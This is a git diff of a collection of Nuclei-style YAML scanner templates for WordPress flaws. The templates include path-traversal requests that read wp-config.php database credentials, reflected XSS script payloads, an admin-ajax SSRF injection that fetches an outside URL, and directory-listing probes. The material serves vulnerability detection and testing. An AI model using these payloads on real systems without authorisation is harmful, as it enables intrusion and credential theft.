+ description: A vulnerability in Javo Spot Premium Theme allows remote unauthenticated attackers access to locally stored file and return their content.
reference:
- https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
- https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
- https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
- metadata:
- max-request: 1
- tags: wordpress,wp-theme,lfi,wp,wpscan
-
-http:
+ tags: wordpress,wp-theme,lfi,wp
+requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'
-
matchers-condition: and
matchers:
- type: word
@@ -30,9 +21,6 @@ http:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
-
- type: status
status:
- 200
-
-# digest: 4b0a00483046022100d5a26ecb5591b611b16a4a1e369d97635fc7bb9905cc8c3e153e6888118b2356022100b117f48ee2a84d8badde3cc23950232db0900a4adc39618e14e488e24a65e943:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-javospot-lfi-11482.yaml b/poc/wordpress/wp-javospot-lfi-11482.yaml
deleted file mode 100644
index 6786157651..0000000000
--- a/poc/wordpress/wp-javospot-lfi-11482.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: wp-javospot-lfi
-info:
- name: Javo Spot Premium Theme - Unauthenticated Directory Traversal
- author: 0x_Akoko
- severity: high
- description: A vulnerability in Javo Spot Premium Theme allows remote unauthenticated attackers access to locally stored file and return their content.
- reference:
- - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
- - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
- - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068
- tags: wordpress,wp-theme,lfi,wp
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "DB_NAME"
- - "DB_PASSWORD"
- condition: and
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wp-knews-xss-11483.yaml b/poc/wordpress/wp-knews-xss-11483.yaml
index 31a8055697..94f404c685 100644
--- a/poc/wordpress/wp-knews-xss-11483.yaml
+++ b/poc/wordpress/wp-knews-xss-11483.yaml
@@ -3,7 +3,8 @@ info:
name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
- reference: https://www.securityfocus.com/bid/54330/info
+ reference:
+ - http://web.archive.org/web/20210213220043/https://www.securityfocus.com/bid/54330/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
diff --git a/poc/wordpress/wp-knews-xss-11484.yaml b/poc/wordpress/wp-knews-xss-11484.yaml
index 6fa9a4d0f1..a88307fe4d 100644
--- a/poc/wordpress/wp-knews-xss-11484.yaml
+++ b/poc/wordpress/wp-knews-xss-11484.yaml
@@ -3,18 +3,17 @@ info:
name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
- reference:
- - https://www.securityfocus.com/bid/54330/info
+ reference: https://www.securityfocus.com/bid/54330/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E '
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
part: header
diff --git a/poc/wordpress/wp-knews-xss-11487.yaml b/poc/wordpress/wp-knews-xss-11487.yaml
deleted file mode 100644
index 94f404c685..0000000000
--- a/poc/wordpress/wp-knews-xss-11487.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: wp-knews-xss
-info:
- name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference:
- - http://web.archive.org/web/20210213220043/https://www.securityfocus.com/bid/54330/info
- tags: wordpress,xss,wp-plugin
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wp-license-file-11489.yaml b/poc/wordpress/wp-license-file-11489.yaml
new file mode 100644
index 0000000000..d5777717de
--- /dev/null
+++ b/poc/wordpress/wp-license-file-11489.yaml
@@ -0,0 +1,17 @@
+id: wp-license-file
+info:
+ name: WordPress license file disclosure
+ author: yashgoti
+ severity: info
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/license.txt"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "WordPress - Web publishing software"
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wp-license-file-11491.yaml b/poc/wordpress/wp-license-file-11491.yaml
deleted file mode 100644
index 5948f09b55..0000000000
--- a/poc/wordpress/wp-license-file-11491.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: wp-license-file
-info:
- name: WordPress license file disclosure
- author: yashgoti
- severity: info
- tags: wordpress
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/license.txt"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "WordPress - Web publishing software"
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wp-license-file.yaml b/poc/wordpress/wp-license-file.yaml
index d5777717de..362154a5b6 100644
--- a/poc/wordpress/wp-license-file.yaml
+++ b/poc/wordpress/wp-license-file.yaml
@@ -1,17 +1,26 @@
id: wp-license-file
+
info:
name: WordPress license file disclosure
author: yashgoti
severity: info
-requests:
+ metadata:
+ max-request: 1
+ tags: wordpress
+
+http:
- method: GET
path:
- "{{BaseURL}}/license.txt"
+
matchers-condition: and
matchers:
- type: word
words:
- "WordPress - Web publishing software"
+
- type: status
status:
- 200
+
+# digest: 4a0a0047304502206e223315c583ed132220ae814ff52f7d9a38356ea28b867be2a3567d5f45a803022100b800eadb0d76425f83f5d3dc78873e325c5480b5cde9a9143013d3b59603685b:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-mailchimp-log-exposure-11492.yaml b/poc/wordpress/wp-mailchimp-log-exposure-11492.yaml
deleted file mode 100644
index 1471c0f2f8..0000000000
--- a/poc/wordpress/wp-mailchimp-log-exposure-11492.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: wp-mailchimp-log-exposure
-info:
- name: WordPress Mailchimp 4 Debug Log Exposure
- author: aashiq
- severity: medium
- description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content
- tags: logs,wordpress,exposure
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "WARNING: Form"
- - type: word
- words:
- - 'text/plain'
- part: header
diff --git a/poc/wordpress/wp-mailchimp-log-exposure.yaml b/poc/wordpress/wp-mailchimp-log-exposure-11494.yaml
similarity index 100%
rename from poc/wordpress/wp-mailchimp-log-exposure.yaml
rename to poc/wordpress/wp-mailchimp-log-exposure-11494.yaml
diff --git a/poc/wordpress/wp-memphis-documents-library-lfi-11497.yaml b/poc/wordpress/wp-memphis-documents-library-lfi-11497.yaml
index 64fa4656f6..51481b15d6 100644
--- a/poc/wordpress/wp-memphis-documents-library-lfi-11497.yaml
+++ b/poc/wordpress/wp-memphis-documents-library-lfi-11497.yaml
@@ -1,17 +1,13 @@
id: wp-memphis-documents-library-lfi
info:
- name: WordPress Memphis Document Library 3.1.5 - Local File Inclusion
+ name: WordPress Plugin Memphis Document Library 3.1.5 LFI
author: 0x_Akoko
severity: high
- description: WordPress Memphis Document Library 3.1.5 is vulnerable to local file inclusion.
+ tags: wordpress,wp-plugin,lfi
+ description: Arbitrary file download in Memphis Document Library 3.1.5
reference:
- https://www.exploit-db.com/exploits/39593
- https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
- tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
@@ -28,5 +24,3 @@ requests:
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/07/29
diff --git a/poc/wordpress/wp-memphis-documents-library-lfi.yaml b/poc/wordpress/wp-memphis-documents-library-lfi.yaml
deleted file mode 100644
index 51481b15d6..0000000000
--- a/poc/wordpress/wp-memphis-documents-library-lfi.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: wp-memphis-documents-library-lfi
-info:
- name: WordPress Plugin Memphis Document Library 3.1.5 LFI
- author: 0x_Akoko
- severity: high
- tags: wordpress,wp-plugin,lfi
- description: Arbitrary file download in Memphis Document Library 3.1.5
- reference:
- - https://www.exploit-db.com/exploits/39593
- - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php'
- - '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "DB_NAME"
- - "DB_PASSWORD"
- part: body
- condition: and
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wp-mstore-plugin-listing.yaml b/poc/wordpress/wp-mstore-plugin-listing.yaml
new file mode 100644
index 0000000000..b978fbaad6
--- /dev/null
+++ b/poc/wordpress/wp-mstore-plugin-listing.yaml
@@ -0,0 +1,23 @@
+id: wp-mstore-plugin-listing
+info:
+ name: Wordpress Plugin MStore API
+ author: pussycat0x
+ severity: low
+ description: Searches for sensitive directories present in the wordpress-plugins plugin.
+ metadata:
+ google-dork: inurl:/wp-content/plugins/mstore-api/
+ tags: wordpress,listing,wp-plugin
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mstore-api/"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of"
+ - "/wp-content/plugins/mstore-api"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wp-multiple-theme-ssrf-11508.yaml b/poc/wordpress/wp-multiple-theme-ssrf-11508.yaml
index 0c399ba1b6..6c69d4125a 100644
--- a/poc/wordpress/wp-multiple-theme-ssrf-11508.yaml
+++ b/poc/wordpress/wp-multiple-theme-ssrf-11508.yaml
@@ -1,31 +1,28 @@
id: wp-multiple-theme-ssrf
-
info:
name: WordPress Multiple Themes - Unauthenticated Function Injection
author: madrobot
severity: high
- reference:
- - https://www.exploit-db.com/exploits/49327
- - https://wpscan.com/vulnerability/10417
tags: wordpress,rce,ssrf
-
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1
Host: {{Hostname}}
+ Accept-Language: en
+ Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Content-Length: 158
+ Connection: close
- action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://interact.sh
-
+ action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com
matchers-condition: and
matchers:
- type: word
- part: body
words:
- - "Interactsh Server"
+ - "Example Domain"
- "protocol_version"
-
+ part: body
- type: status
status:
- 200
diff --git a/poc/wordpress/wp-multiple-theme-ssrf-11510.yaml b/poc/wordpress/wp-multiple-theme-ssrf-11510.yaml
index 08f2810f63..4fe1fb2f7a 100644
--- a/poc/wordpress/wp-multiple-theme-ssrf-11510.yaml
+++ b/poc/wordpress/wp-multiple-theme-ssrf-11510.yaml
@@ -4,10 +4,10 @@ info:
name: WordPress Multiple Themes - Unauthenticated Function Injection
author: madrobot
severity: high
+ tags: wordpress,rce,ssrf
reference:
- https://www.exploit-db.com/exploits/49327
- https://wpscan.com/vulnerability/10417
- tags: wordpress,rce,ssrf
requests:
- raw:
diff --git a/poc/wordpress/wp-multiple-theme-ssrf-11513.yaml b/poc/wordpress/wp-multiple-theme-ssrf-11513.yaml
deleted file mode 100644
index 4fe1fb2f7a..0000000000
--- a/poc/wordpress/wp-multiple-theme-ssrf-11513.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: wp-multiple-theme-ssrf
-
-info:
- name: WordPress Multiple Themes - Unauthenticated Function Injection
- author: madrobot
- severity: high
- tags: wordpress,rce,ssrf
- reference:
- - https://www.exploit-db.com/exploits/49327
- - https://wpscan.com/vulnerability/10417
-
-requests:
- - raw:
- - |
- POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Example Domain"
- - "protocol_version"
- part: body
-
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wp-nextgen-xss-11516.yaml b/poc/wordpress/wp-nextgen-xss-11516.yaml
new file mode 100644
index 0000000000..1a9dc549ba
--- /dev/null
+++ b/poc/wordpress/wp-nextgen-xss-11516.yaml
@@ -0,0 +1,25 @@
+id: wp-nextgen-xss
+info:
+ name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference:
+ - https://www.securityfocus.com/bid/57200/info
+ tags: wordpress,xss,wp-plugin
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wp-nextgen-xss-11518.yaml b/poc/wordpress/wp-nextgen-xss-11518.yaml
index e4b63e62aa..b6dd8865a7 100644
--- a/poc/wordpress/wp-nextgen-xss-11518.yaml
+++ b/poc/wordpress/wp-nextgen-xss-11518.yaml
@@ -4,7 +4,8 @@ info:
name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
- reference: https://www.securityfocus.com/bid/57200/info
+ reference:
+ - https://www.securityfocus.com/bid/57200/info
tags: wordpress,xss,wp-plugin
requests:
diff --git a/poc/wordpress/wp-oxygen-theme-lfi-11519.yaml b/poc/wordpress/wp-oxygen-theme-lfi-11519.yaml
index 903bb5679d..d407ffa1b0 100644
--- a/poc/wordpress/wp-oxygen-theme-lfi-11519.yaml
+++ b/poc/wordpress/wp-oxygen-theme-lfi-11519.yaml
@@ -1,16 +1,10 @@
id: wp-oxygen-theme-lfi
info:
- name: WordPress Oxygen-Theme - Local File Inclusion
+ name: WordPress Oxygen-Theme Themes LFI
author: 0x_Akoko
severity: high
- description: WordPress Oxygen-Theme has a local file inclusion vulnerability via the 'file' parameter of 'download.php'.
- reference:
- - https://cxsecurity.com/issue/WLB-2019030178
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
- tags: wordpress,wp-theme,lfi
+ tags: wordpress,wp-theme,lfi,wp
+ reference: https://cxsecurity.com/issue/WLB-2019030178
requests:
- method: GET
path:
@@ -26,5 +20,3 @@ requests:
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/07/29
diff --git a/poc/wordpress/wp-oxygen-theme-lfi.yaml b/poc/wordpress/wp-oxygen-theme-lfi.yaml
new file mode 100644
index 0000000000..903bb5679d
--- /dev/null
+++ b/poc/wordpress/wp-oxygen-theme-lfi.yaml
@@ -0,0 +1,30 @@
+id: wp-oxygen-theme-lfi
+info:
+ name: WordPress Oxygen-Theme - Local File Inclusion
+ author: 0x_Akoko
+ severity: high
+ description: WordPress Oxygen-Theme has a local file inclusion vulnerability via the 'file' parameter of 'download.php'.
+ reference:
+ - https://cxsecurity.com/issue/WLB-2019030178
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cwe-id: CWE-22
+ tags: wordpress,wp-theme,lfi
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ part: body
+ condition: and
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/poc/wordpress/wp-phpfreechat-xss-11527.yaml b/poc/wordpress/wp-phpfreechat-xss-11527.yaml
index 6deb475d0b..077f6e51e9 100644
--- a/poc/wordpress/wp-phpfreechat-xss-11527.yaml
+++ b/poc/wordpress/wp-phpfreechat-xss-11527.yaml
@@ -1,30 +1,24 @@
id: wp-phpfreechat-xss
-
info:
name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
- reference:
- - https://www.securityfocus.com/bid/54332/info
+ reference: https://www.securityfocus.com/bid/54332/info
tags: wordpress,xss,wp-plugin
-
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
-
matchers-condition: and
matchers:
- type: word
words:
- ""
part: body
-
- type: word
part: header
words:
- text/html
-
- type: status
status:
- 200
diff --git a/poc/wordpress/wp-plugin-1-flashgallery-listing-11531.yaml b/poc/wordpress/wp-plugin-1-flashgallery-listing-11531.yaml
index 441e99d924..337e6f2106 100644
--- a/poc/wordpress/wp-plugin-1-flashgallery-listing-11531.yaml
+++ b/poc/wordpress/wp-plugin-1-flashgallery-listing-11531.yaml
@@ -1,23 +1,16 @@
id: wp-plugin-1-flashgallery-listing
-
info:
name: WordPress 1 flash gallery listing
author: pussycat0x
- severity: info
- description: Searches for sensitive directories present in the 1-flash-gallery plugin.
+ severity: low
+ description: Searches for sensitive directories present in the wordpress-plugins plugin.
reference: https://www.exploit-db.com/ghdb/6978
- metadata:
- max-request: 2
tags: wordpress,listing
-
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/1-flash-gallery/"
- "{{BaseURL}}/blog/wp-content/plugins/1-flash-gallery/"
-
- stop-at-first-match: true
-
matchers-condition: and
matchers:
- type: word
@@ -25,9 +18,6 @@ http:
- "Index of"
- "/wp-content/plugins/1-flash-gallery"
condition: and
-
- type: status
status:
- 200
-
-# digest: 4a0a00473045022100884daeb1739f883e52729e92eb4cd727ee55ee7576207d71d458c564c449afa902203d521c5d604fa1242c163b75faeb034d69040112ca31df9c51670d61d225964c:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-plugin-lifterlms-11533.yaml b/poc/wordpress/wp-plugin-lifterlms-11533.yaml
index 95fcaf817c..e2d87ebb84 100644
--- a/poc/wordpress/wp-plugin-lifterlms-11533.yaml
+++ b/poc/wordpress/wp-plugin-lifterlms-11533.yaml
@@ -1,13 +1,12 @@
id: wordpress-plugins-lifterlms
-
info:
name: WordPress Plugin lifterlms Listing
author: pussycat0x
- severity: low
+ severity: info
description: Searches for sensitive directories present in the wordpress-plugins plugin.
- reference: https://www.exploit-db.com/ghdb/6420
- tags: wordpress,listing
-
+ reference:
+ - https://www.exploit-db.com/ghdb/6420
+ tags: wordpress,listing,plugin
requests:
- method: GET
path:
@@ -19,7 +18,6 @@ requests:
- "Index of"
- "/wp-content/plugins/lifterlms/"
condition: and
-
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/poc/wordpress/wp-plugin-marmoset-viewer-xss-11538.yaml b/poc/wordpress/wp-plugin-marmoset-viewer-xss-11538.yaml
index 81f56916b4..64f52771fa 100644
--- a/poc/wordpress/wp-plugin-marmoset-viewer-xss-11538.yaml
+++ b/poc/wordpress/wp-plugin-marmoset-viewer-xss-11538.yaml
@@ -1,22 +1,26 @@
id: wp-plugin-marmoset-viewer-xss
+
info:
name: Wordpress Plugin Marmoset Viewer XSS
author: johnjhacking
severity: medium
tags: wordpress,xss
reference: https://wordpress.org/plugins/marmoset-viewer/#developers
+
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://